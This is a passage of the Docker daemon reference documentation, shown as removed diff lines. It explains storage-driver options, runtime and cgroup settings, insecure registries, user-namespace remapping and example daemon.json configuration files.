in daemon mode -$ sudo /dockerd -H tcp://127.0.0.1:2375 -H unix:///var/run/docker.sock & -# Download an ubuntu image, use default Unix socket -$ docker pull ubuntu -# OR use the TCP port -$ docker -H tcp://127.0.0.1:2375 pull ubuntu -``` - -### Daemon storage-driver option - -The Docker daemon has support for several different image layer storage -drivers: `aufs`, `devicemapper`, `btrfs`, `zfs`, `overlay` and `overlay2`. 
- -The `aufs` driver is the oldest, but is based on a Linux kernel patch-set that -is unlikely to be merged into the main kernel. These are also known to cause -some serious kernel crashes. However, `aufs` allows containers to share -executable and shared library memory, so is a useful choice when running -thousands of containers with the same program or libraries. - -The `devicemapper` driver uses thin provisioning and Copy on Write (CoW) -snapshots. For each devicemapper graph location – typically -`/var/lib/docker/devicemapper` – a thin pool is created based on two block -devices, one for data and one for metadata. By default, these block devices -are created automatically by using loopback mounts of automatically created -sparse files. Refer to [Storage driver options](#storage-driver-options) below -for a way how to customize this setup. -[~jpetazzo/Resizing Docker containers with the Device Mapper plugin](http://jpetazzo.github.io/2014/01/29/docker-device-mapper-resize/) -article explains how to tune your existing setup without the use of options. - -The `btrfs` driver is very fast for `docker build` - but like `devicemapper` -does not share executable memory between devices. Use -`dockerd -s btrfs -g /mnt/btrfs_partition`. - -The `zfs` driver is probably not as fast as `btrfs` but has a longer track record -on stability. Thanks to `Single Copy ARC` shared blocks between clones will be -cached only once. Use `dockerd -s zfs`. To select a different zfs filesystem -set `zfs.fsname` option as described in [Storage driver options](#storage-driver-options). - -The `overlay` is a very fast union filesystem. It is now merged in the main -Linux kernel as of [3.18.0](https://lkml.org/lkml/2014/10/26/137). `overlay` -also supports page cache sharing, this means multiple containers accessing -the same file can share a single page cache entry (or entries), it makes -`overlay` as efficient with memory as `aufs` driver. Call -`dockerd -s overlay` to use it. 
- -> **Note:** -> As promising as `overlay` is, the feature is still quite young and should not -> be used in production. Most notably, using `overlay` can cause excessive -> inode consumption (especially as the number of images grows), as well as -> being incompatible with the use of RPMs. - -The `overlay2` uses the same fast union filesystem but takes advantage of -[additional features](https://lkml.org/lkml/2015/2/11/106) added in Linux -kernel 4.0 to avoid excessive inode consumption. Call `dockerd -s overlay2` -to use it. - -> **Note:** -> Both `overlay` and `overlay2` are currently unsupported on `btrfs` or any -> Copy on Write filesystem and should only be used over `ext4` partitions. - -### Storage driver options - -Particular storage-driver can be configured with options specified with -`--storage-opt` flags. Options for `devicemapper` are prefixed with `dm`, -options for `zfs` start with `zfs` and options for `btrfs` start with `btrfs`. - -#### Devicemapper options - -* `dm.thinpooldev` - - Specifies a custom block storage device to use for the thin pool. - - If using a block device for device mapper storage, it is best to use `lvm` - to create and manage the thin-pool volume. This volume is then handed to Docker - to exclusively create snapshot volumes needed for images and containers. - - Managing the thin-pool outside of Engine makes for the most feature-rich - method of having Docker utilize device mapper thin provisioning as the - backing storage for Docker containers. The highlights of the lvm-based - thin-pool management feature include: automatic or interactive thin-pool - resize support, dynamically changing thin-pool features, automatic thinp - metadata checking when lvm activates the thin-pool, etc. - - As a fallback if no thin pool is provided, loopback files are - created. Loopback is very slow, but can be used without any - pre-configuration of storage. It is strongly recommended that you do - not use loopback in production. 
Ensure your Engine daemon has a - `--storage-opt dm.thinpooldev` argument provided. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.thinpooldev=/dev/mapper/thin-pool - ``` - -* `dm.basesize` - - Specifies the size to use when creating the base device, which limits the - size of images and containers. The default value is 10G. Note, thin devices - are inherently "sparse", so a 10G device which is mostly empty doesn't use - 10 GB of space on the pool. However, the filesystem will use more space for - the empty case the larger the device is. - - The base device size can be increased at daemon restart which will allow - all future images and containers (based on those new images) to be of the - new base device size. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.basesize=50G - ``` - - This will increase the base device size to 50G. The Docker daemon will throw an - error if existing base device size is larger than 50G. A user can use - this option to expand the base device size however shrinking is not permitted. - - This value affects the system-wide "base" empty filesystem - that may already be initialized and inherited by pulled images. Typically, - a change to this value requires additional steps to take effect: - - ```bash - $ sudo service docker stop - $ sudo rm -rf /var/lib/docker - $ sudo service docker start - ``` - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.basesize=20G - ``` - -* `dm.loopdatasize` - - > **Note**: - > This option configures devicemapper loopback, which should not - > be used in production. - - Specifies the size to use when creating the loopback file for the - "data" device which is used for the thin pool. The default size is - 100G. The file is sparse, so it will not initially take up this - much space. 
- - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.loopdatasize=200G - ``` - -* `dm.loopmetadatasize` - - > **Note**: - > This option configures devicemapper loopback, which should not - > be used in production. - - Specifies the size to use when creating the loopback file for the - "metadata" device which is used for the thin pool. The default size - is 2G. The file is sparse, so it will not initially take up - this much space. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.loopmetadatasize=4G - ``` - -* `dm.fs` - - Specifies the filesystem type to use for the base device. The supported - options are "ext4" and "xfs". The default is "xfs" - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.fs=ext4 - ``` - -* `dm.mkfsarg` - - Specifies extra mkfs arguments to be used when creating the base device. - - Example use: - - ```bash - $ sudo dockerd --storage-opt "dm.mkfsarg=-O ^has_journal" - ``` - -* `dm.mountopt` - - Specifies extra mount options used when mounting the thin devices. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.mountopt=nodiscard - ``` - -* `dm.datadev` - - (Deprecated, use `dm.thinpooldev`) - - Specifies a custom blockdevice to use for data for the thin pool. - - If using a block device for device mapper storage, ideally both datadev and - metadatadev should be specified to completely avoid using the loopback - device. - - Example use: - - ```bash - $ sudo dockerd \ - --storage-opt dm.datadev=/dev/sdb1 \ - --storage-opt dm.metadatadev=/dev/sdc1 - ``` - -* `dm.metadatadev` - - (Deprecated, use `dm.thinpooldev`) - - Specifies a custom blockdevice to use for metadata for the thin pool. - - For best performance the metadata should be on a different spindle than the - data, or even better on an SSD. - - If setting up a new metadata pool it is required to be valid. 
This can be - achieved by zeroing the first 4k to indicate empty metadata, like this: - - ```bash - $ dd if=/dev/zero of=$metadata_dev bs=4096 count=1 - ``` - - Example use: - - ```bash - $ sudo dockerd \ - --storage-opt dm.datadev=/dev/sdb1 \ - --storage-opt dm.metadatadev=/dev/sdc1 - ``` - -* `dm.blocksize` - - Specifies a custom blocksize to use for the thin pool. The default - blocksize is 64K. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.blocksize=512K - ``` - -* `dm.blkdiscard` - - Enables or disables the use of blkdiscard when removing devicemapper - devices. This is enabled by default (only) if using loopback devices and is - required to resparsify the loopback file on image/container removal. - - Disabling this on loopback can lead to *much* faster container removal - times, but will make the space used in `/var/lib/docker` directory not be - returned to the system for other use when containers are removed. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.blkdiscard=false - ``` - -* `dm.override_udev_sync_check` - - Overrides the `udev` synchronization checks between `devicemapper` and `udev`. - `udev` is the device manager for the Linux kernel. - - To view the `udev` sync support of a Docker daemon that is using the - `devicemapper` driver, run: - - ```bash - $ docker info - [...] - Udev Sync Supported: true - [...] - ``` - - When `udev` sync support is `true`, then `devicemapper` and udev can - coordinate the activation and deactivation of devices for containers. - - When `udev` sync support is `false`, a race condition occurs between - the`devicemapper` and `udev` during create and cleanup. The race condition - results in errors and failures. 
(For information on these failures, see - [docker#4036](https://github.com/docker/docker/issues/4036)) - - To allow the `docker` daemon to start, regardless of `udev` sync not being - supported, set `dm.override_udev_sync_check` to true: - - ```bash - $ sudo dockerd --storage-opt dm.override_udev_sync_check=true - ``` - - When this value is `true`, the `devicemapper` continues and simply warns - you the errors are happening. - - > **Note:** - > The ideal is to pursue a `docker` daemon and environment that does - > support synchronizing with `udev`. For further discussion on this - > topic, see [docker#4036](https://github.com/docker/docker/issues/4036). - > Otherwise, set this flag for migrating existing Docker daemons to - > a daemon with a supported environment. - -* `dm.use_deferred_removal` - - Enables use of deferred device removal if `libdm` and the kernel driver - support the mechanism. - - Deferred device removal means that if device is busy when devices are - being removed/deactivated, then a deferred removal is scheduled on - device. And devices automatically go away when last user of the device - exits. - - For example, when a container exits, its associated thin device is removed. - If that device has leaked into some other mount namespace and can't be - removed, the container exit still succeeds and this option causes the - system to schedule the device for deferred removal. It does not wait in a - loop trying to remove a busy device. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.use_deferred_removal=true - ``` - -* `dm.use_deferred_deletion` - - Enables use of deferred device deletion for thin pool devices. By default, - thin pool device deletion is synchronous. Before a container is deleted, - the Docker daemon removes any associated devices. If the storage driver - can not remove a device, the container deletion fails and daemon returns. 
-
- Error deleting container: Error response from daemon: Cannot destroy container
-
- To avoid this failure, enable both deferred device deletion and deferred
- device removal on the daemon.
-
- ```bash
- $ sudo dockerd \
- --storage-opt dm.use_deferred_deletion=true \
- --storage-opt dm.use_deferred_removal=true
- ```
-
- With these two options enabled, if a device is busy when the driver is
- deleting a container, the driver marks the device as deleted. Later, when
- the device isn't in use, the driver deletes it.
-
- In general it should be safe to enable this option by default. It will help
- when unintentional leaking of mount point happens across multiple mount
- namespaces.
-
-* `dm.min_free_space`
-
- Specifies the min free space percent in a thin pool required for new device
- creation to succeed. This check applies to both free data space as well
- as free metadata space. Valid values are from 0% - 99%. Value 0% disables
- free space checking logic. If the user does not specify a value for this option,
- the Engine uses a default value of 10%.
-
- Whenever a new thin pool device is created (during `docker pull` or during
- container creation), the Engine checks if the minimum free space is
- available. If sufficient space is unavailable, then device creation fails
- and any relevant `docker` operation fails.
-
- To recover from this error, you must create more free space in the thin
- pool. You can create free space by deleting some images
- and containers from the thin pool. You can also add more storage to the thin
- pool.
-
- To add more space to an LVM (logical volume management) thin pool, just add
- more storage to the volume group container thin pool; this should automatically
- resolve any errors. If your configuration uses loop devices, then stop the
- Engine daemon, grow the size of loop files and restart the daemon to resolve
- the issue.
- - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.min_free_space=10% - ``` - -* `dm.xfs_nospace_max_retries` - - Specifies the maximum number of retries XFS should attempt to complete - IO when ENOSPC (no space) error is returned by underlying storage device. - - By default XFS retries infinitely for IO to finish and this can result - in unkillable process. To change this behavior one can set - xfs_nospace_max_retries to say 0 and XFS will not retry IO after getting - ENOSPC and will shutdown filesystem. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0 - ``` - -#### ZFS options - -* `zfs.fsname` - - Set zfs filesystem under which docker will create its own datasets. - By default docker will pick up the zfs filesystem where docker graph - (`/var/lib/docker`) is located. - - Example use: - - ```bash - $ sudo dockerd -s zfs --storage-opt zfs.fsname=zroot/docker - ``` - -#### Btrfs options - -* `btrfs.min_space` - - Specifies the minimum size to use when creating the subvolume which is used - for containers. If user uses disk quota for btrfs when creating or running - a container with **--storage-opt size** option, docker should ensure the - **size** cannot be smaller than **btrfs.min_space**. - - Example use: - - ```bash - $ sudo dockerd -s btrfs --storage-opt btrfs.min_space=10G - ``` - -#### Overlay2 options - -* `overlay2.override_kernel_check` - - Overrides the Linux kernel version check allowing overlay2. Support for - specifying multiple lower directories needed by overlay2 was added to the - Linux kernel in 4.0.0. However some older kernel versions may be patched - to add multiple lower directory support for OverlayFS. This option should - only be used after verifying this support exists in the kernel. Applying - this option on a kernel without this support will cause failures on mount. 
-
-## Docker runtime execution options
-
-The Docker daemon relies on an
-[OCI](https://github.com/opencontainers/runtime-spec) compliant runtime
-(invoked via the `containerd` daemon) as its interface to the Linux
-kernel `namespaces`, `cgroups`, and `SELinux`.
-
-By default, the Docker daemon automatically starts `containerd`. If you want to
-control `containerd` startup, manually start `containerd` and pass the path to
-the `containerd` socket using the `--containerd` flag. For example:
-
-```bash
-$ sudo dockerd --containerd /var/run/dev/docker-containerd.sock
-```
-
-Runtimes can be registered with the daemon either via the
-configuration file or using the `--add-runtime` command line argument.
-
-The following is an example adding 2 runtimes via the configuration:
-
-```json
-{
- "default-runtime": "runc",
- "runtimes": {
- "runc": {
- "path": "runc"
- },
- "custom": {
- "path": "/usr/local/bin/my-runc-replacement",
- "runtimeArgs": [
- "--debug"
- ]
- }
- }
-}
-```
-
-This is the same example via the command line:
-
-```bash
-$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement
-```
-
-> **Note**: defining runtime arguments via the command line is not supported.
-
-## Options for the runtime
-
-You can configure the runtime using options specified
-with the `--exec-opt` flag. All the flag's options have the `native` prefix. A
-single `native.cgroupdriver` option is available.
-
-The `native.cgroupdriver` option specifies the management of the container's
-cgroups. You can only specify `cgroupfs` or `systemd`. If you specify
-`systemd` and it is not available, the system errors out. If you omit the
-`native.cgroupdriver` option, `cgroupfs` is used.
-
-This example sets the `cgroupdriver` to `systemd`:
-
-```bash
-$ sudo dockerd --exec-opt native.cgroupdriver=systemd
-```
-
-Setting this option applies to all containers the daemon launches.
-
-Also Windows Container makes use of `--exec-opt` for special purpose.
Docker user -can specify default container isolation technology with this, for example: - -```bash -$ sudo dockerd --exec-opt isolation=hyperv -``` - -Will make `hyperv` the default isolation technology on Windows. If no isolation -value is specified on daemon start, on Windows client, the default is -`hyperv`, and on Windows server, the default is `process`. - -## Daemon DNS options - -To set the DNS server for all Docker containers, use: - -```bash -$ sudo dockerd --dns 8.8.8.8 -``` - - -To set the DNS search domain for all Docker containers, use: - -```bash -$ sudo dockerd --dns-search example.com -``` - - -## Insecure registries - -Docker considers a private registry either secure or insecure. In the rest of -this section, *registry* is used for *private registry*, and `myregistry:5000` -is a placeholder example for a private registry. - -A secure registry uses TLS and a copy of its CA certificate is placed on the -Docker host at `/etc/docker/certs.d/myregistry:5000/ca.crt`. An insecure -registry is either not using TLS (i.e., listening on plain text HTTP), or is -using TLS with a CA certificate not known by the Docker daemon. The latter can -happen when the certificate was not found under -`/etc/docker/certs.d/myregistry:5000/`, or if the certificate verification -failed (i.e., wrong CA). - -By default, Docker assumes all, but local (see local registries below), -registries are secure. Communicating with an insecure registry is not possible -if Docker assumes that registry is secure. In order to communicate with an -insecure registry, the Docker daemon requires `--insecure-registry` in one of -the following two forms: - -* `--insecure-registry myregistry:5000` tells the Docker daemon that - myregistry:5000 should be considered insecure. -* `--insecure-registry 10.1.0.0/16` tells the Docker daemon that all registries - whose domain resolve to an IP address is part of the subnet described by the - CIDR syntax, should be considered insecure. 
- -The flag can be used multiple times to allow multiple registries to be marked -as insecure. - -If an insecure registry is not marked as insecure, `docker pull`, -`docker push`, and `docker search` will result in an error message prompting -the user to either secure or pass the `--insecure-registry` flag to the Docker -daemon as described above. - -Local registries, whose IP address falls in the 127.0.0.0/8 range, are -automatically marked as insecure as of Docker 1.3.2. It is not recommended to -rely on this, as it may change in the future. - -Enabling `--insecure-registry`, i.e., allowing un-encrypted and/or untrusted -communication, can be useful when running a local registry. However, -because its use creates security vulnerabilities it should ONLY be enabled for -testing purposes. For increased security, users should add their CA to their -system's list of trusted CAs instead of enabling `--insecure-registry`. - -## Legacy Registries - -Enabling `--disable-legacy-registry` forces a docker daemon to only interact with registries which support the V2 protocol. Specifically, the daemon will not attempt `push`, `pull` and `login` to v1 registries. The exception to this is `search` which can still be performed on v1 registries. - -## Running a Docker daemon behind an HTTPS_PROXY - -When running inside a LAN that uses an `HTTPS` proxy, the Docker Hub -certificates will be replaced by the proxy's certificates. These certificates -need to be added to your Docker host's configuration: - -1. Install the `ca-certificates` package for your distribution -2. Ask your network admin for the proxy's CA certificate and append them to - `/etc/pki/tls/certs/ca-bundle.crt` -3. Then start your Docker daemon with `HTTPS_PROXY=http://username:password@proxy:port/ dockerd`. - The `username:` and `password@` are optional - and are only needed if your - proxy is set up to require authentication. 
-
-This will only add the proxy and authentication to the Docker daemon's requests -
-your `docker build`s and running containers will need extra configuration to
-use the proxy
-
-## Default Ulimits
-
-`--default-ulimit` allows you to set the default `ulimit` options to use for
-all containers. It takes the same options as `--ulimit` for `docker run`. If
-these defaults are not set, `ulimit` settings will be inherited, if not set on
-`docker run`, from the Docker daemon. Any `--ulimit` options passed to
-`docker run` will overwrite these defaults.
-
-Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to
-set the maximum number of processes available to a user, not to a container. For details
-please check the [run](run.md) reference.
-
-## Nodes discovery
-
-The `--cluster-advertise` option specifies the `host:port` or `interface:port`
-combination that this particular daemon instance should use when advertising
-itself to the cluster. The daemon is reached by remote hosts through this value.
-If you specify an interface, make sure it includes the IP address of the actual
-Docker host. For Engine installation created through `docker-machine`, the
-interface is typically `eth1`.
-
-The daemon uses [libkv](https://github.com/docker/libkv/) to advertise
-the node within the cluster. Some key-value backends support mutual
-TLS. The client TLS settings used by the daemon can be configured
-using the `--cluster-store-opt` flag, specifying the paths to PEM encoded
-files.
For example: - -```bash -$ sudo dockerd \ - --cluster-advertise 192.168.1.2:2376 \ - --cluster-store etcd://192.168.1.2:2379 \ - --cluster-store-opt kv.cacertfile=/path/to/ca.pem \ - --cluster-store-opt kv.certfile=/path/to/cert.pem \ - --cluster-store-opt kv.keyfile=/path/to/key.pem -``` - -The currently supported cluster store options are: - -* `discovery.heartbeat` - - Specifies the heartbeat timer in seconds which is used by the daemon as a - keepalive mechanism to make sure discovery module treats the node as alive - in the cluster. If not configured, the default value is 20 seconds. - -* `discovery.ttl` - - Specifies the ttl (time-to-live) in seconds which is used by the discovery - module to timeout a node if a valid heartbeat is not received within the - configured ttl value. If not configured, the default value is 60 seconds. - -* `kv.cacertfile` - - Specifies the path to a local file with PEM encoded CA certificates to trust - -* `kv.certfile` - - Specifies the path to a local file with a PEM encoded certificate. This - certificate is used as the client cert for communication with the - Key/Value store. - -* `kv.keyfile` - - Specifies the path to a local file with a PEM encoded private key. This - private key is used as the client key for communication with the - Key/Value store. - -* `kv.path` - - Specifies the path in the Key/Value store. If not configured, the default value is 'docker/nodes'. - -## Access authorization - -Docker's access authorization can be extended by authorization plugins that your -organization can purchase or build themselves. You can install one or more -authorization plugins when you start the Docker `daemon` using the -`--authorization-plugin=PLUGIN_ID` option. - -```bash -$ sudo dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... -``` - -The `PLUGIN_ID` value is either the plugin's name or a path to its specification -file. The plugin's implementation determines whether you can specify a name or -path. 
Consult with your Docker administrator to get information about the -plugins available to you. - -Once a plugin is installed, requests made to the `daemon` through the command -line or Docker's Engine API are allowed or denied by the plugin. If you have -multiple plugins installed, at least one must allow the request for it to -complete. - -For information about how to create an authorization plugin, see [authorization -plugin](../../extend/plugins_authorization.md) section in the Docker extend section of this documentation. - - -## Daemon user namespace options - -The Linux kernel [user namespace support](http://man7.org/linux/man-pages/man7/user_namespaces.7.html) provides additional security by enabling -a process, and therefore a container, to have a unique range of user and -group IDs which are outside the traditional user and group range utilized by -the host system. Potentially the most important security improvement is that, -by default, container processes running as the `root` user will have expected -administrative privilege (with some restrictions) inside the container but will -effectively be mapped to an unprivileged `uid` on the host. - -When user namespace support is enabled, Docker creates a single daemon-wide mapping -for all containers running on the same engine instance. The mappings will -utilize the existing subordinate user and group ID feature available on all modern -Linux distributions. -The [`/etc/subuid`](http://man7.org/linux/man-pages/man5/subuid.5.html) and -[`/etc/subgid`](http://man7.org/linux/man-pages/man5/subgid.5.html) files will be -read for the user, and optional group, specified to the `--userns-remap` -parameter. If you do not wish to specify your own user and/or group, you can -provide `default` as the value to this flag, and a user will be created on your behalf -and provided subordinate uid and gid ranges. 
This default user will be named -`dockremap`, and entries will be created for it in `/etc/passwd` and -`/etc/group` using your distro's standard user and group creation tools. - -> **Note**: The single mapping per-daemon restriction is in place for now -> because Docker shares image layers from its local cache across all -> containers running on the engine instance. Since file ownership must be -> the same for all containers sharing the same layer content, the decision -> was made to map the file ownership on `docker pull` to the daemon's user and -> group mappings so that there is no delay for running containers once the -> content is downloaded. This design preserves the same performance for `docker -> pull`, `docker push`, and container startup as users expect with -> user namespaces disabled. - -### Starting the daemon with user namespaces enabled - -To enable user namespace support, start the daemon with the -`--userns-remap` flag, which accepts values in the following formats: - - - uid - - uid:gid - - username - - username:groupname - -If numeric IDs are provided, translation back to valid user or group names -will occur so that the subordinate uid and gid information can be read, given -these resources are name-based, not id-based. If the numeric ID information -provided does not exist as entries in `/etc/passwd` or `/etc/group`, daemon -startup will fail with an error message. - -**Example: starting with default Docker user management:** - -```bash -$ sudo dockerd --userns-remap=default -``` - -When `default` is provided, Docker will create - or find the existing - user and group -named `dockremap`. If the user is created, and the Linux distribution has -appropriate support, the `/etc/subuid` and `/etc/subgid` files will be populated -with a contiguous 65536 length range of subordinate user and group IDs, starting -at an offset based on prior entries in those files. 
For example, Ubuntu will -create the following range, based on an existing user named `user1` already owning -the first 65536 range: - -```bash -$ cat /etc/subuid -user1:100000:65536 -dockremap:165536:65536 -``` - -If you have a preferred/self-managed user with subordinate ID mappings already -configured, you can provide that username or uid to the `--userns-remap` flag. -If you have a group that doesn't match the username, you may provide the `gid` -or group name as well; otherwise the username will be used as the group name -when querying the system for the subordinate group ID range. - -The output of `docker info` can be used to determine if the daemon is running -with user namespaces enabled or not. If the daemon is configured with user -namespaces, the Security Options entry in the response will list "userns" as -one of the enabled security features. - -### Detailed information on `subuid`/`subgid` ranges - -Given potential advanced use of the subordinate ID ranges by power users, the -following paragraphs define how the Docker daemon currently uses the range entries -found within the subordinate range files. - -The simplest case is that only one contiguous range is defined for the -provided user or group. In this case, Docker will use that entire contiguous -range for the mapping of host uids and gids to the container process. This -means that the first ID in the range will be the remapped root user, and the -IDs above that initial ID will map host ID 1 through the end of the range. - -From the example `/etc/subuid` content shown above, the remapped root -user would be uid 165536. - -If the system administrator has set up multiple ranges for a single user or -group, the Docker daemon will read all the available ranges and use the -following algorithm to create the mapping ranges: - -1. The range segments found for the particular user will be sorted by *start ID* ascending. -2. 
Map segments will be created from each range in increasing value with a length matching the length of each segment. Therefore the range segment with the lowest numeric starting value will be equal to the remapped root, and continue up through host uid/gid equal to the range segment length. As an example, if the lowest segment starts at ID 1000 and has a length of 100, then a map of 1000 -> 0 (the remapped root) up through 1100 -> 100 will be created from this segment. If the next segment starts at ID 10000, then the next map will start with mapping 10000 -> 101 up to the length of this second segment. This will continue until no more segments are found in the subordinate files for this user. -3. If more than five range segments exist for a single user, only the first five will be utilized, matching the kernel's limitation of only five entries in `/proc/self/uid_map` and `proc/self/gid_map`. - -### Disable user namespace for a container - -If you enable user namespaces on the daemon, all containers are started -with user namespaces enabled. In some situations you might want to disable -this feature for a container, for example, to start a privileged container (see -[user namespace known restrictions](#user-namespace-known-restrictions)). -To enable those advanced features for a specific container use `--userns=host` -in the `run/exec/create` command. -This option will completely disable user namespace mapping for the container's user. - -### User namespace known restrictions - -The following standard Docker features are currently incompatible when -running a Docker daemon with user namespaces enabled: - - - sharing PID or NET namespaces with the host (`--pid=host` or `--net=host`) - - Using `--privileged` mode flag on `docker run` (unless also specifying `--userns=host`) - -In general, user namespaces are an advanced feature and will require -coordination with other capabilities. 
For example, if volumes are mounted from -the host, file ownership will have to be pre-arranged if the user or -administrator wishes the containers to have expected access to the volume -contents. Note that when using external volume or graph driver plugins, those -external software programs must be made aware of user and group mapping ranges -if they are to work seamlessly with user namespace support. - -Finally, while the `root` user inside a user namespaced container process has -many of the expected admin privileges that go along with being the superuser, the -Linux kernel has restrictions based on internal knowledge that this is a user namespaced -process. The most notable restriction that we are aware of at this time is the -inability to use `mknod`. Permission will be denied for device creation even as -container `root` inside a user namespace. - -## Miscellaneous options - -IP masquerading uses address translation to allow containers without a public -IP to talk to other machines on the Internet. This may interfere with some -network topologies and can be disabled with `--ip-masq=false`. - -Docker supports softlinks for the Docker data directory (`/var/lib/docker`) and -for `/var/lib/docker/tmp`. The `DOCKER_TMPDIR` and the data directory can be -set like this: - - DOCKER_TMPDIR=/mnt/disk2/tmp /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1 - # or - export DOCKER_TMPDIR=/mnt/disk2/tmp - /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1 - -## Default cgroup parent - -The `--cgroup-parent` option allows you to set the default cgroup parent -to use for containers. If this option is not set, it defaults to `/docker` for -fs cgroup driver and `system.slice` for systemd cgroup driver. - -If the cgroup has a leading forward slash (`/`), the cgroup is created -under the root cgroup, otherwise the cgroup is created under the daemon -cgroup. 
- -Assuming the daemon is running in cgroup `daemoncgroup`, -`--cgroup-parent=/foobar` creates a cgroup in -`/sys/fs/cgroup/memory/foobar`, whereas using `--cgroup-parent=foobar` -creates the cgroup in `/sys/fs/cgroup/memory/daemoncgroup/foobar` - -The systemd cgroup driver has different rules for `--cgroup-parent`. Systemd -represents hierarchy by slice and the name of the slice encodes the location in -the tree. So `--cgroup-parent` for systemd cgroups should be a slice name. A -name can consist of a dash-separated series of names, which describes the path -to the slice from the root slice. For example, `--cgroup-parent=user-a-b.slice` -means the memory cgroup for the container is created in -`/sys/fs/cgroup/memory/user.slice/user-a.slice/user-a-b.slice/docker-.scope`. - -This setting can also be set per container, using the `--cgroup-parent` -option on `docker create` and `docker run`, and takes precedence over -the `--cgroup-parent` option on the daemon. - -## Daemon Metrics - -The `--metrics-addr` option takes a tcp address to serve the metrics API. -This feature is still experimental, therefore, the daemon must be running in experimental -mode for this feature to work. - -To serve the metrics API on localhost:1337 you would specify `--metrics-addr 127.0.0.1:1337` -allowing you to make requests on the API at `127.0.0.1:1337/metrics` to receive metrics in the -[prometheus](https://prometheus.io/docs/instrumenting/exposition_formats/) format. - -If you are running a prometheus server you can add this address to your scrape configs -to have prometheus collect metrics on Docker. For more information -on prometheus you can view the website [here](https://prometheus.io/). - -```yml -scrape_configs: - - job_name: 'docker' - static_configs: - - targets: ['127.0.0.1:1337'] -``` - -Please note that this feature is still marked as experimental as metrics and metric -names could change while this feature is still in experimental. 
Please provide -feedback on what you would like to see collected in the API. - -## Daemon configuration file - -The `--config-file` option allows you to set any configuration option -for the daemon in a JSON format. This file uses the same flag names as keys, -except for flags that allow several entries, where it uses the plural -of the flag name, e.g., `labels` for the `label` flag. - -The options set in the configuration file must not conflict with options set -via flags. The docker daemon fails to start if an option is duplicated between -the file and the flags, regardless their value. We do this to avoid -silently ignore changes introduced in configuration reloads. -For example, the daemon fails to start if you set daemon labels -in the configuration file and also set daemon labels via the `--label` flag. -Options that are not present in the file are ignored when the daemon starts. - -### Linux configuration file - -The default location of the configuration file on Linux is -`/etc/docker/daemon.json`. The `--config-file` flag can be used to specify a - non-default location. 
- -This is a full example of the allowed configuration options on Linux: - -```json -{ - "authorization-plugins": [], - "dns": [], - "dns-opts": [], - "dns-search": [], - "exec-opts": [], - "exec-root": "", - "experimental": false, - "storage-driver": "", - "storage-opts": [], - "labels": [], - "live-restore": true, - "log-driver": "", - "log-opts": {}, - "mtu": 0, - "pidfile": "", - "graph": "", - "cluster-store": "", - "cluster-store-opts": {}, - "cluster-advertise": "", - "max-concurrent-downloads": 3, - "max-concurrent-uploads": 5, - "shutdown-timeout": 15, - "debug": true, - "hosts": [], - "log-level": "", - "tls": true, - "tlsverify": true, - "tlscacert": "", - "tlscert": "", - "tlskey": "", - "swarm-default-advertise-addr": "", - "api-cors-header": "", - "selinux-enabled": false, - "userns-remap": "", - "group": "", - "cgroup-parent": "", - "default-ulimits": {}, - "init": false, - "init-path": "/usr/libexec/docker-init", - "ipv6": false, - "iptables": false, - "ip-forward": false, - "ip-masq": false, - "userland-proxy": false, - "userland-proxy-path": "/usr/libexec/docker-proxy", - "ip": "0.0.0.0", - "bridge": "", - "bip": "", - "fixed-cidr": "", - "fixed-cidr-v6": "", - "default-gateway": "", - "default-gateway-v6": "", - "icc": false, - "raw-logs": false, - "registry-mirrors": [], - "seccomp-profile": "", - "insecure-registries": [], - "disable-legacy-registry": false, - "default-runtime": "runc", - "oom-score-adjust": -500, - "runtimes": { - "runc": { - "path": "runc" - }, - "custom": { - "path": "/usr/local/bin/my-runc-replacement", - "runtimeArgs": [ - "--debug" - ] - } - } -} -``` - -### Windows configuration file - -The default location of the configuration file on Windows is - `%programdata%\docker\config\daemon.json`. The `--config-file` flag can be - used to specify a non-default location. 
- -This is a full example of the allowed configuration options on Windows: - -```json -{ - "authorization-plugins": [], - "dns": [], - "dns-opts": [], - "dns-search": [], - "exec-opts": [], - "experimental": false, - "storage-driver": "", - "storage-opts": [], - "labels": [], - "log-driver": "", - "mtu": 0, - "pidfile": "", - "graph": "", - "cluster-store": "", - "cluster-advertise": "", - "max-concurrent-downloads": 3, - "max-concurrent-uploads": 5, - "shutdown-timeout": 15, - "debug": true, - "hosts": [], - "log-level": "", - "tlsverify": true, - "tlscacert": "", - "tlscert": "", - "tlskey": "", - "swarm-default-advertise-addr": "", - "group": "", - "default-ulimits": {}, - "bridge": "", - "fixed-cidr": "", - "raw-logs": false, - "registry-mirrors": [], - "insecure-registries": [], - "disable-legacy-registry": false -} -``` - -### Configuration reloading - -Some options can be reconfigured when the daemon is running without requiring -to restart the process. We use the `SIGHUP` signal in Linux to reload, and a global event -in Windows with the key `Global\docker-daemon-config-$PID`. The options can -be modified in the configuration file but still will check for conflicts with -the provided flags. The daemon fails to reconfigure itself -if there are conflicts, but it won't stop execution. - -The list of currently supported options that can be reconfigured is this: - -- `debug`: it changes the daemon to debug mode when set to true. -- `cluster-store`: it reloads the discovery store with the new address. -- `cluster-store-opts`: it uses the new options to reload the discovery store. -- `cluster-advertise`: it modifies the address advertised after reloading. -- `labels`: it replaces the daemon labels with a new set of labels. -- `live-restore`: Enables [keeping containers alive during daemon downtime](https://docs.docker.com/engine/admin/live-restore/). -- `max-concurrent-downloads`: it updates the max concurrent downloads for each pull. 
